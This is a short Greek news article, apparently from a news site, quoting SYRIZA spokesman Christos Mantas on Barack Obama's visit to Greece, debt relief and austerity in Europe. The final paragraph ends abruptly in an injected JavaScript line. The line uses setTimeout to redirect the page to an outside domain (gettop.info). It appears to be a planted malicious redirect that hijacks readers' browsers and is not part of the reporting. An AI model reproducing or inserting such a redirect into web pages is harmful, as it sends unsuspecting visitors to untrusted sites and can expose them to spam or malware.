Μαντάς: Συμβολική και ουσιαστική η επίσκεψη Ομπάμα

0
4

 

            «Συμβολική και ουσιαστική ήταν η επίσκεψη του Μπάρακ Ομπάμα» στην Ελλάδα δήλωσε στον ραδιοφωνικό σταθμό του Αθηναϊκού και Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 fm», ο κοινοβουλευτικός εκπρόσωπος του ΣΥΡΙΖΑ, Χρήστος Μαντάς, σύμφωνα με τον οποίο, το μήνυμα που μεταδόθηκε ως είδηση από τα διεθνή μέσα ενημέρωσης ότι δεν μπορεί να υπάρξει ανάπτυξη και δικαιοσύνη για τους πιο αδύναμους ανθρώπους μέσα σε αυτό το ασφυκτικό πλαίσιο της λιτότητας, «οπωσδήποτε συνδεόταν με το θέμα ελληνικού και ευρωπαϊκού ενδιαφέροντος, το θέμα της απομείωσης του χρέους».

«Το ουσιαστικό θέμα είναι ότι η χώρα σε αυτή την πολύ κρίσιμη χρονικά συγκυρία επιχειρεί να διαμορφώσει λύσεις που, όπως υπογράμμισε και ο Πρόεδρος Ομπάμα, πρέπει να είναι ανθεκτικές λύσεις για τη βιωσιμότητα, όχι μόνο του ελληνικού χρέους αλλά και για τη σταθερή ανάπτυξη της χώρας μας που είναι σε ένα κρίσιμο σημείο γεωπολιτικά για την Ευρώπη και για ολόκληρο τον κόσμο. Σε μια αστάθεια που επικρατεί παντού γύρω γύρω, η χώρα μας είναι μια σταθερή νησίδα και αυτό έχει τεράστια σημασία και για την Ευρώπη και για ολόκληρο τον κόσμο» τόνισε.

«Όποιος δεν μετράει σοβαρά τις επισημάνσεις του ηγέτη μιας χώρας που παίζει καθοριστικό ρόλο σε όλο τον πλανήτη, μάλλον προσεγγίζει με μίζερο τρόπο τη διεθνή πραγματικότητα. Όσες τέτοιες δηλώσεις, ή απόψεις, είδα, νομίζω ότι έχουν αυτό το χαρακτηριστικό» είπε και πρόσθεσε ότι επρόκειτο για την τελευταία περιοδεία του Προέδρου Ομπάμα στην Ευρώπη, με πρώτο σταθμό την Αθήνα και με ένα μήνυμα που αφορά συνολικότερα την πολιτική της Ευρώπης, ώστε να ξεφύγει από τη δογματική προσήλωση στη μονόπλευρη λιτότητα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here